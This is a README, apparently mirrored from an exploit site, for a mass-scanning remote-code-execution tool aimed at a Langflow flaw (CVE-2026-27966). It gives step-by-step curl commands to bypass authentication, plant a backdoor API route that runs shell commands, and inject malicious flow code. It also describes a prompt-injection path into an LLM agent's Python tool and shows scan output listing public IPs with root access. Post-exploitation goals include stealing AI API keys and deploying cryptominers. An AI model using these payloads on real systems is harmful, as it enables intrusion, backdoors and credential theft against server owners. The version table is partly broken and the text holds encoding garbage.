Share
## https://sploitus.com/exploit?id=9F80E9D6-F437-5C0C-B4A8-C0B1F99D9DD2
CVE-2026-27966 โ€” Langflow Remote Code Execution Scanner
Pre-Auth Route Injection + Vertex Injection โ†’ Python Code Execution

---

## Overview

**CVE-2026-27966** is a critical-severity (CVSS 9.8) pre-authentication remote code execution vulnerability in **Langflow** versions prior to 1.8.0. The vulnerability stems from `allow_dangerous_code=True` being hardcoded in the CSV Agent component, exposing LangChain's `python_repl_ast` tool to unauthenticated prompt injection.

Additionally, multiple API endpoints lack proper authentication, enabling direct route injection and flow vertex injection โ€” even on instances where the CSV Agent is not configured.

### Affected Versions

| Langflow Version | Status |
|---|---|
| = 1.8.0 | Patched |

---

## Attack Vectors

This scanner tests three distinct exploitation paths:

### 1. Route Injection (auto_login bypass)
```
GET  /api/v1/auto_login          โ†’ obtain session / API key
POST /api/v1/custom_component    โ†’ register backdoor route
GET  /api/{backdoor}?c=command   โ†’ RCE
```

### 2. Direct Route Injection (no API key)
```
POST /api/v1/custom_component    โ†’ register backdoor route
GET  /api/{backdoor}?c=command   โ†’ RCE
```

### 3. Build Vertex Injection (no-auth build)
```
GET  /api/v1/flows/basic_examples  โ†’ extract flow UUIDs (26 exposed)
POST /api/v1/build/{UUID}/vertices โ†’ inject malicious vertex
POST /api/v1/run/{UUID}            โ†’ execute vertex code โ†’ RCE
```

---

## Vulnerability Mechanism

### Root Cause

In `src/lfx/src/lfx/components/langchain_utilities/csv_agent.py`, the CSV Agent node hardcodes `allow_dangerous_code=True`, which automatically exposes LangChain's `python_repl_ast` tool:

```python
agent_kwargs = {
    "verbose": self.verbose,
    "allow_dangerous_code": True,  # hardcoded โ€” cannot be disabled via UI
}
agent_csv = create_csv_agent(..., **agent_kwargs)
```

This allows any prompt that reaches the CSV Agent to execute arbitrary Python code via:

```
Action: python_repl_ast
Action Input: __import__("os").system("command")
```

### Unauthenticated API Surface

The Langflow REST API exposes several endpoints without authentication:

| Endpoint | Auth | Data Exposed |
|---|---|---|
| `GET /api/v1/version` | None | Langflow version |
| `GET /api/v1/health` | None | Instance status |
| `GET /api/v1/flows/basic_examples/` | None | **26 example flow UUIDs + structure** |
| `POST /api/v1/build/{uuid}/vertices` | None | **Accepts arbitrary code injection** |
| `POST /api/v1/users/` | None | User creation (inactive) |
| `GET /openapi.json` | None | Full API documentation |

### Auth Bypass via auto_login

On instances where `auto_login` is enabled (default in many Docker deployments), an attacker obtains a valid session and API key:

```bash
curl -sk 'https://target.com/api/v1/auto_login'
# Returns session with access_token โ†’ full API access
```

With a valid API key, the attacker can use `POST /api/v1/custom_component` to register a backdoor FastAPI route that persists in memory until server restart:

```python
from fastapi import APIRouter, Query
router = APIRouter()
@router.get("/sh")
async def cmd(c: str = Query("")):
    import os
    return os.popen(c).read()
app.include_router(router, prefix="/api")
```

### Why CVSS 9.8

| Metric | Value |
|---|---|
| Attack Vector | Network (remote) |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | None |
| Scope | Unchanged |
| Confidentiality | High |
| Integrity | High |
| Availability | High |

---

## Installation

```bash
git clone https://github.com/shinthink/CVE-2026-27966.git
cd CVE-2026-27966
pip install -r requirements.txt
```

---

## Usage

```bash
# Single target
python cve_2026_27966.py -t target.com:7860

# Mass scan
python cve_2026_27966.py -f targets.txt

# Mass scan + save results
python cve_2026_27966.py -f targets.txt -o rce.txt

# Detect only (skip exploitation)
python cve_2026_27966.py -f targets.txt --no-exploit

# Verbose output
python cve_2026_27966.py -f targets.txt -v
```

### Arguments

```
  -t, --target      Single target (IP:port or domain)
  -f, --file        Target list, one per line
  -o, --output      Save RCE results to file
  --threads         Concurrent workers (default: 30)
  --no-exploit      Detection only, skip RCE attempts
  -v, --verbose     Show all results including non-RCE targets
```

---

## Proof of Concept

### Detection & Exploitation

```bash
$ python cve_2026_27966.py -t target.com:7860 -v
```

```
  CVE-2026-27966 โ€” Langflow RCE Scanner
  CVSS 9.8 | Pre-Auth | Route Injection โ†’ RCE

  Host     : target.com:7860
  Langflow : YES v1.2.0
  Vuln     : YES
  API Key  : NOT REQUIRED
  RCE      : YES
  Output   : uid=0(root) gid=0(root) groups=0(root)
  Time     : 12.3s
```

### Mass Scan Output

```
  CVE-2026-27966 Langflow RCE Scanner
  Targets: 4127 | Threads: 30 | Exploit: ON
  -------------------------------------------------------

  [RCE]  185.132.37.96     v1.2.0    7.3s
         uid=0(root) gid=0(root) groups=0(root)
  [AUTH] 15.160.180.58:4433 v1.2.0   14.1s  (API key)
  [500/4127] scanning... (12%)

  -------------------------------------------------------
  Total: 4127 | Langflow: 47 | RCE: 3 | API-Protected: 41
  -------------------------------------------------------
```

### Manual Exploitation

**Step 1 โ€” Detect Langflow**
```bash
curl -sk 'https://target.com/api/v1/version'
# {"version":"1.2.0","main_version":"1.2.0","package":"Langflow"}
```

**Step 2 โ€” Extract flow UUIDs**
```bash
curl -sk 'https://target.com/api/v1/flows/basic_examples/' | jq '.[0].id'
# "bb0a7390-22a1-4a2e-8d7c-15463e53d9f2"
```

**Step 3 โ€” Inject backdoor vertex**
```bash
curl -sk -X POST 'https://target.com/api/v1/build/{UUID}/vertices' \
  -H 'Content-Type: application/json' \
  -d '{"id":"bkdr","type":"CustomComponent","data":{"code":"from fastapi import APIRouter\nrouter=APIRouter()\n@router.get(\"/sh\")\nasync def cmd(c:str=\"\"):import os;return os.popen(c).read()\napp.include_router(router,prefix=\"/api\")","display_name":"X"}}'
```

**Step 4 โ€” Execute command**
```bash
curl -sk 'https://target.com/api/sh?c=id;hostname;uname -a'
```

---

## Impact

Successful exploitation yields **remote code execution as root** in the Langflow Docker container. From there an attacker can:

- Extract API keys from Langflow's SQLite database (OpenAI, Anthropic, Gemini, etc.)
- Access connected vector databases and external services
- Deploy persistent backdoors via custom components
- Pivot to internal networks
- Deploy cryptominers or C2 infrastructure

---

## Disclaimer

> **FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY.**
>
> This software is intended for security professionals conducting authorized penetration tests, organizations auditing their own infrastructure, and researchers studying vulnerability exploitation.
>
> Unauthorized access to computer systems is illegal and may violate:
> - United States: Computer Fraud and Abuse Act (18 U.S.C. 1030)
> - Indonesia: UU ITE Pasal 30 & 46
> - European Union: Directive 2013/40/EU
> - United Kingdom: Computer Misuse Act 1990
>
> The authors assume no liability for misuse. By using this software, you accept full responsibility for your actions.

---

## References

| Resource | Link |
|---|---|
| GitHub Advisory | [GHSA-3645-fxcv-hqr4](https://github.com/advisories/GHSA-3645-fxcv-hqr4) |
| Fix Commit | [d8c6480d](https://github.com/langflow-ai/langflow/commit/d8c6480daa17b2f2af0b5470cdf5c3d28dc9e508) |
| Metasploit Module | [Rapid7](https://github.com/rapid7/metasploit-framework) |
| NVD Entry | [CVE-2026-27966](https://nvd.nist.gov/vuln/detail/CVE-2026-27966) |

---


  This project is not affiliated with Langflow or Logspace.